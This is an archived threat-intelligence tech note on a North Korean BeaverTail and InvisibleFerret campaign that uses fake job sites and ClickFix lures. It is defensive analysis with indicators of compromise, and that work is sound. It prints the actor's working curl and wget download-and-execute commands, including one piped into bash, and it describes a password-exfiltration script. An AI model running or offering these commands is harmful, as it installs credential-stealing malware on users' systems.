{ "id": "ce706824-8fb8-4670-aa1c-526696f1e32d", "created_at": "2026-04-06T00:10:18.393861Z", "updated_at": "2026-04-10T13:12:36.303009Z", "deleted_at": null, "sha1_hash": "77e88d2213778c698f6612940a73631da452f367", "title": "Tech Note - BeaverTail variant distributed via malicious repositories and ClickFix lure", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1240883, "plain_text": "Tech Note - BeaverTail variant distributed via malicious\r\nrepositories and ClickFix lure\r\nArchived: 2026-04-02 11:08:21 UTC\r\n17 September 2025 - Oliver Smith, GitLab Threat Intelligence\r\nKey Points\r\nWe’ve identified infrastructure used to distribute BeaverTail and InvisibleFerret malware variants since at\r\nleast May 2025. BeaverTail and InvisibleFerret are malware families operated by North Korean nation-state threat actors tracked under identifiers including Contagious Interview and Famous Chollima.\r\nWe’re publicizing this campaign because it contains slight shifts in threat actor tradecraft that may provide\r\ninsight into the direction of future operations:\r\nThe threat actor used ClickFix lures to target marketing and trader roles in cryptocurrency and retail\r\nsector organizations rather than targeting software development roles.\r\nThe threat actor’s malware was compiled into executables rather than typical distribution as scripts\r\nreliant on interpreters already present on target systems.\r\nWe assess that this activity was likely being tested by the threat actor and related malware is unlikely to\r\nhave been distributed at scale to date.\r\nBackground\r\nBeaverTail is JavaScript malware named by Palo Alto Unit 42 in 2023. BeaverTail is commonly hidden inside\r\nmalicious code repositories distributed to software developers under the false pretext of a job interview or work\r\nopportunity. BeaverTail has also been distributed as part of software supply chain attacks via the NPM package\r\nregistry and in campaigns trojanizing legitimate applications. BeaverTail infections steal sensitive cryptocurrency\r\nwallet data and browser and system credentials then load a second stage Python information stealer and remote\r\naccess tool tracked as InvisibleFerret.\r\nClickFix is a social engineering technique by which a threat actor attempts to induce a target to run a malicious\r\ncommand by presenting the user with a fake CAPTCHA or troubleshooting advice for a fake error. North Korean\r\nnation-state threat actor ClickFix attacks have been publicly documented since at least early 2025, however\r\ntypically relate to the distribution of a Golang malware variant tracked as GolangGhost and FlexibleFerret rather\r\nthan BeaverTail.\r\nBeaverTail + ClickFix\r\nIn late May 2025, a North Korean nation-state threat actor created infrastructure that used a ClickFix pretext to\r\ninduce job seekers to execute a compiled version of BeaverTail. The threat actor created a fake hiring platform\r\nweb application hosted at businesshire[.]top using the Vercel project hireproflix-iauhsmsuv-gabriels-projects-75362d20.vercel.app . The threat actor’s web application contained social engineering pretexts inviting\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 1 of 9\n\njob applications and investment inquiries. The threat actor’s web application included elements to apply for the\r\nfollowing:\r\nCryptocurrency trader roles at four web3 organizations\r\nSales or marketing roles at three web3 organizations and one US-based ecommerce retailer\r\nInvitations to invest at a web3 organization\r\nThe threat actor’s targeting of marketing applicants and impersonation of a retail sector organization is noteworthy\r\ngiven BeaverTail distributors’ usual focus on software developers and the cryptocurrency sector.\r\nThe threat actor’s backend service is hosted at nvidiasdk.fly[.]dev , and remains active as of the time of\r\npublication. We have not previously observed North Korean nation-state abuse of the Fly.io service. When a new\r\nvisitor accessed businesshire[.]top , the web application pinged the threat actor’s backend to obtain the\r\nvisitor’s IP address and made a request to api.ipify.org to obtain the user’s geolocation. The threat actor’s web\r\napplication also attempted to access cryptocurrency wallet-related objects in the browser’s window scope and\r\nrelayed any detected wallets to the threat actor on initial check in.\r\n[\"ethereum\", \"tronLink\", \"trustwallet\", \"coinbaseWalletExtension\", \"exodus\", \"BinanceChain\", \"okexchain\", \"enkr\r\nCryptocurrency-related elements targeted for discovery in threat actor's web application.\r\nApplication pages induce visitors to enter personal details and respond to text-based questions before concluding\r\nwith a prompt to record a short video response to a question. When attempting to record a video response, visitors\r\nare presented with a fake technical error related to their camera or microphone and troubleshooting instructions.\r\nTroubleshooting instructions are dynamic based on a visitor’s operating system as detected from their user agent\r\nstring. Both the job lure content and the fake troubleshooting instructions overlap with fake job interviews\r\nattributed to Famous Chollima by Cisco Talos in June.\r\nTroubleshooting instructions contain an operating system-specific command to execute a subsequent stage via the\r\nsystem command line.\r\ncurl -k -A 204 -o /var/tmp/nvidia.pkg https://nvidiasdk.fly[.]dev/nvs \u0026\u0026 sudo installer -pkg /var/tmp/nvidia.pk\r\ncurl -k -A 203 -o \"%temp%\\nvidia.tar.gz\" https://nvidiasdk.fly[.]dev/nvs \u0026\u0026 tar -xf \"%temp%\\nvidia.tar.gz\" -C \"\r\nwget --no-check-certificate --user-agent=\"208\" -qO- https://nvidiasdk.fly[.]dev/nvs | bash\r\nmacOS, Windows, and Linux ClickFix commands.\r\nIn each instance the payload URL is the same, with dynamic behaviour based on different numeric user agent\r\nheaders included in the commands. If a request is made without a specific user agent, the threat actor’s service\r\nresponds with a decoy payload. For example, for a request made from a Windows device without the header, the\r\nthreat actor’s service responds with an archive containing a benign VisualBasic script file and a legitimate, signed\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 2 of 9\n\nNvidia Broadcast executable. Alternatively, if a request is made with the 203 header, the threat actor’s service\r\nresponds with the true second stage. We’ve observed this type of header-based execution guardrail becoming\r\nincreasingly common in BeaverTail and OtterCookie operations through 2025. These guardrails delay automated\r\nidentification and linking of the threat actor’s infrastructure and reduce their footprint in security sandboxes.\r\nFor each operating system, the command is intended to execute BeaverTail. For macOS and Windows hosts,\r\nBeaverTail is downloaded in a compiled form rather than typical JavaScript form. For macOS, the infection chain\r\nalso optionally includes a compiled version of InvisibleFerret. The binaries are produced using bundling tools like\r\npkg and PyInstaller rather than QT-compiled BeaverTail variants previously identified by Palo Alto. The binaries\r\nhave notably low static detection rates on VirusTotal (as low as zero at the time of publication) however exhibit\r\nwell-signatured network and file system behaviour upon execution.\r\nAn overview of the infection chains is below. File hashes for each of the components are available in the\r\nAppendix, and we’ve uploaded copies of referenced files to VirusTotal, Malshare, and Abuse.ch (size limits\r\npermitting) to enable third-party analysis.\r\nmacOS Delivery Chain\r\nThe macOS ClickFix command downloads an installer package from the threat actor’s backend and attempts to\r\ninstall it with sudo . The installer is for a package named com.nvidiahpc.pkg which contains no payload data\r\nand only serves to execute a preinstall script named preinstall .\r\nThe preinstall script attempts to read a user’s password from the variable MY_PASWOR in the file ~/.myvars\r\nand exfiltrate it to a remote IP address, hxxp[:]//172.86.93[.]139:3000/pawr/ . This file location and variable\r\nname are nonstandard and we assess these are likely testing artifacts that remain in the malware.\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 3 of 9\n\nThe preinstall script downloads and attempts to execute a bash script named downx64.sh contained in the\r\nbai branch of the GitHub repository /RominaMabelRamirez/dify . Commit history indicates that these files\r\nwere uploaded to GitHub in late April 2025 in a commit made by the Git identity Yash-1511\r\n\u003cyash1511@gmail.com\u003e . The downx64.sh script downloads two additional unsigned Mach-O binaries from the\r\nsame branch and repository, x64nvidia and payuniversal2 .\r\nThe downx64.sh script executes x64nvidia immediately. x64nvidia contains a stripped-down BeaverTail\r\nvariant, analyzed below. The payuniversal2 binary is a PyInstaller-compiled version of InvisibleFerret that\r\nprovides redundancy on systems without Python installed or where BeaverTail execution is interrupted. The\r\ndownx64.sh script executes the payuniversal2 binary only if either of the following cases is true:\r\nThe output of [ ! -x /usr/bin/python3 ] evaluates to true, meaning that Python 3 is not present and\r\nexecutable at a common global install location.\r\nIf after 10 seconds, the file ~/.npc does not exist. This file is the InvisibleFerret entry point Python script,\r\ndropped by BeaverTail.\r\nThe increased bundling of dependencies and redundancy to execute on a broader range of systems is consistent\r\nwith the targeting of non-software developer roles. Non-developers are less likely to have JavaScript and Python\r\ninterpreters present on their systems, meaning the threat actor needs to bundle dependencies to ensure execution.\r\nWindows Delivery Chain\r\nThe Windows ClickFix command downloads an archive named nvidia.tar.gz containing the following files:\r\nnvidiasdk.tar.gz\r\n├── .vscode\r\n│ └── argv.exe\r\n├── nvidiasdk.exe\r\n├── p8.zi\r\n└── update.vbs\r\nThe update.vbs script is a VisualBasic script that performs two actions:\r\nInvokes the hidden ./vscode/argv.exe executable, a renamed copy of 7zip, to extract the p8.zi archive\r\nusing the password ppp . The archive contains benign Python dependencies intended to be used by the\r\nsubsequent InvisibleFerret stage. These files are extracted to a hidden .pyp directory in the user’s home\r\ndirectory.\r\nExecutes the nvidiasdk.exe executable, which contains BeaverTail.\r\nLinux Delivery Chain\r\nThe Linux ClickFix command uses wget to download a script file, which is piped directly into bash . This\r\nscript installs node via the nvm-sh installer script, downloads a subsequent script from\r\nhxxps[:]//nvidiasdk.fly[.].dev/nvs using the user agent 209 and writes it to the file ~/.linvidia . Finally,\r\nthe script executes the payload with the command node ~/.linvidia 2\u003e\u00261 \u0026 .\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 4 of 9\n\nThe ~/.linvidia file contains a JavaScript version of BeaverTail, functionally identical to the versions that\r\nappear compiled into executables in the macOS and Windows infection chains.\r\nBeaverTail Variant\r\nThe BeaverTail variant associated with this campaign contains a simplified information stealer routine and targets\r\nfewer browser extensions. The variant targets only eight browser extensions rather than the 22 targeted in other\r\ncontemporary BeaverTail variants we’ve observed, dropping less widely installed cryptocurrency wallets. The\r\nvariant also omits dedicated functions targeting data for browsers other than Chrome, reducing overall size by\r\naround one third. The variant includes only minor string obfuscation using base64 slices rather than obfuscation\r\nvia javascript-obfuscator that we have commonly observed in BeaverTail code projects we identify and disrupt on\r\nGitLab.com.\r\nThe Windows version contains a small substitution intended to load python dependencies from the password-protected archive shipped alongside the malware using a 7z binary at .vscode/argv.json . This routine is a\r\nredundant copy of a step also present in the update.vbs script discussed above. We’ve observed an identical\r\nBeaverTail sample in a malicious code repository that also contained a hidden 7zip executable. The entry point for\r\nthe malicious repo is a require statement which reads an encoded filepath from .env to execute a BeaverTail\r\nJavaScript file at ./vscode/desktop.ini . The BeaverTail script downloads InvisibleFerret dependencies in a\r\npassword-protected archive using the same password, ppp . Password-protected archives are a common method\r\nof payload delivery among threat actors generally, but not a technique we typically observe in BeaverTail delivery.\r\nThe BeaverTail and InvisibleFerret samples associated with this campaign both use 172.86.93.139 as a\r\ncommand and control address and use tttttt as the campaign identifier.\r\nThe threat actor’s web application contained a list of hard-coded IP addresses for which the fake technical error\r\nfunctionality would not activate. We also identified an earlier draft of the web application that contained only the\r\nfirst two IP addresses.\r\n188.43.33.250\r\n49.145.111.7\r\n190.120.252.13\r\n118.148.107.73\r\n87.249.132.144\r\n94.224.115.64\r\n198.50.130.118\r\n94.71.186.249\r\n77.166.75.76\r\n134.228.221.237\r\n81.184.178.102\r\n81.34.167.92\r\n50.67.15.10\r\n128.203.96.252\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 5 of 9\n\nWe observed the threat actor originating from the first IP address, 188.43.33.250 , when active on GitLab.com.\r\n188.43.33.250 is a Russian TransTelecom IP address publicly associated with North Korean nation-state\r\nactivity. Based on the inclusion of this IP address in the allowlist, we assess that the allowlist’s purpose almost\r\ncertainly includes protecting operators from the risk of accidental infection. We recommend that organizations,\r\nparticularly operators of services abused by North Korean threat actors, hunt for anomalous activity originating\r\nfrom these IP addresses. We note that this list includes VPN and likely residential proxy infrastructure that is not\r\nexclusively controlled by the threat actor and may include security scanner infrastructure that the threat actor is\r\nattempting to frustrate.\r\nVercel variables indicate that the threat actor’s web application was built from the GitHub repository\r\nRominaMabelRamirez/hflix from a commit made by dmytroviv1 . The dmytroviv1 handle has a GitHub pages\r\npersonal site ( https://dmytroviv1.github.io/ ) containing education and professional history lifted verbatim\r\nand translated from another GitHub user’s Indonesian-language site. The threat actor’s personal site lists the\r\nfollowing contact information:\r\nName: Dmytro Vivsuk\r\nEmail: dmytroviv1[@]gmail.com\r\nPhone number: +380 95 676 27 42\r\nLinkedIn: https://www.linkedin.com/in/dmytro-vivsuk-a568242b6/ (leads to a 404, likely banned\r\nprofile)\r\nAssessment\r\nBased on our observations, the threat actor started developing this campaign in early 2025 and started testing\r\ndeployments from May 2025 onwards. We assess that this campaign is unlikely to have been deployed at scale to\r\ndate based on the low prevalence of secondary payloads in public malware sandboxes and low static detection\r\nrates, development artifacts present in malware, and a low level of polish present in social engineering content.\r\nThe campaign suggests a slight tactical shift for a subgroup of North Korean BeaverTail operators, expanding\r\nbeyond their traditional software developer targeting to pursue marketing and trading roles across cryptocurrency\r\nand retail sectors. The move to compiled malware variants and continued reliance on ClickFix techniques\r\ndemonstrates operational adaptation to reach less technical targets and systems without standard software\r\ndevelopment tools installed. We assess that the threat actor is likely to continue to seek opportunities to expand\r\ntheir potential targets as public awareness of their techniques increases and the available pool of susceptible and\r\ndiscoverable targets becomes saturated.\r\nAppendix - Indicators of Compromise\r\nMalware\r\nIOC Type Description\r\n05ae07783d30b37aa5f0ffff86adde57d0d497fe915537a3fc010230b54e1ee8 SHA256 nvidia.pkg\r\nmalicious\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 6 of 9\n\nIOC Type Description\r\nmacOS installer\r\npackage\r\n247fdba5fbfd076d9c530d937406aa097d6794b9af26bfc64bf6ea765ed51a50 SHA256\r\npreinstall\r\nscript contained\r\nin nvidia.pkg\r\n65665c3faba4fbfed12488e945306b10131afb9d3ad928accdcef75e0945a086 SHA256\r\ndownx64.sh\r\nmacOS installer\r\nscript\r\n25c9fc5c5564a74430b92cb658d43e441dee1b3c0f692dc2571ac2918efa9a52 SHA256\r\nx64nvidia\r\nBeaverTail\r\nMach-O file\r\neba9fdb2f077f9a3e14cf428162b967b5e6c189db19c33c5b11601efcd02b3d3 SHA256\r\npayuniversal2\r\nInvisibleFerret\r\nMach-O file\r\n17891f7db5a633c0186f3c2c8311a16a989b55bb0ba0430da7d2afb7f616c79c SHA256\r\nnvidia.tar.gz\r\nWindows\r\ndelivery archive\r\n6a16b1ef16e999a0d32a4b9189f6f179d629ba143b5b03db06c95156ee089615 SHA256\r\nupdate.vbs\r\nWindows\r\nlauncher script\r\ne79b827b3cc29e940736dc20cc9c25958c0b09c25fc0bc8aacbd6365f38db71f SHA256\r\nnvidiasdk.exe\r\nBeaverTail PE\r\nfile\r\n9bc46c59e734b2389328a5103739f42bed7d820c73f75c49cc5a2e8cacfe8940 SHA256\r\nFirst unnamed\r\npiped bash script\r\nin Linux\r\ninfection chain\r\ne224a1db42ae2164d6b2f2a7f1f0e02056e099fc8d669ce37cdaa0a2a2750e3b SHA256\r\nSecond unnamed\r\npiped bash script\r\nin Linux\r\ninfection chain\r\n4a1588e27a3f322e94e490173fe2bfa8d6e2f407b81a77af8787619b0d3d10bd SHA256\r\nlinvidia\r\nBeaverTail\r\nJavaScript file\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 7 of 9\n\nInfrastructure\r\nIOC Type Description\r\nbusinesshire[.]top Domain\r\nDomain used to host fake recruiting site containing ClickFix\r\ncommands\r\nnvidiasdk.fly[.]dev Domain Backend service and malware staging for businesshire[.]top\r\n172.86.93[.]139 IP Command and Control address for BeaverTail and InvisibleFerret\r\n188.43.33[.]250 IP Threat actor originating IP address\r\nPersonas\r\nIOC Type Description\r\nRominaMabelRamirez\r\nGitHub\r\nhandle\r\nOwner of the Vercel project used to publish fake recruiting site and\r\nGitHub repo containing malware, RominaMabelRamirez/dify\r\nYash-1511\r\nGit\r\nidentity\r\nCommitted malware to RominaMabelRamirez/dify\r\nyash1511@gmail.com\r\nEmail\r\naddress\r\nEmail address associated with Git identity Yash-1511\r\ndmytroviv1\r\nGitHub\r\nhandle\r\nCommitted to fake recruiting site built from\r\nRominaMabelRamirez/hflix\r\nDmytro Vivsuk Name Stated name of dmytroviv1\r\ndmytroviv1@gmail.com\r\nEmail\r\naddress\r\nStated email address of dmytroviv1\r\n+380 95 676 27 42\r\nPhone\r\nnumber\r\nStated phone number of dmytroviv1\r\nGitLab Threat Intelligence Estimative Language\r\nGitLab Threat Intelligence uses specific language to convey the estimated probability attached to our assessments.\r\nWe also use words including \"possible\" and \"may\" in circumstances where we are unable to provide a specific\r\nestimate. Further reading on estimative language is available here.\r\nEstimative Term Highly unlikely Unlikely Real chance Likely Highly likely\r\nProbability Range 0%-20% 20%-40% 40%-60% 60%-80% 80%-100%\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 8 of 9\n\nSource: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/" ], "report_names": [ "north-korean-malware-sept-2025" ], "threat_actors": [ { "id": "7187a642-699d-44b2-9c69-498c80bce81f", "created_at": "2025-08-07T02:03:25.105688Z", "updated_at": "2026-04-10T02:00:03.78394Z", "deleted_at": null, "main_name": "NICKEL TAPESTRY", "aliases": [ "CL-STA-0237 ", "CL-STA-0241 ", "DPRK IT Workers", "Famous Chollima ", "Jasper Sleet Microsoft", "Purpledelta Recorded Future", "Storm-0287 ", "UNC5267 ", "Wagemole " ], "source_name": "Secureworks:NICKEL TAPESTRY", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "d05e8567-9517-4bd8-a952-5e8d66f68923", "created_at": "2024-11-13T13:15:31.114471Z", "updated_at": "2026-04-10T02:00:03.761535Z", "deleted_at": null, "main_name": "WageMole", "aliases": [ "Void Dokkaebi", "WaterPlum", "PurpleBravo", "Famous Chollima", "UNC5267", "Wagemole", "Nickel Tapestry", "Storm-1877" ], "source_name": "MISPGALAXY:WageMole", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434218, "ts_updated_at": 1775826756, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/77e88d2213778c698f6612940a73631da452f367.pdf", "text": "https://archive.orkl.eu/77e88d2213778c698f6612940a73631da452f367.txt", "img": "https://archive.orkl.eu/77e88d2213778c698f6612940a73631da452f367.jpg" } }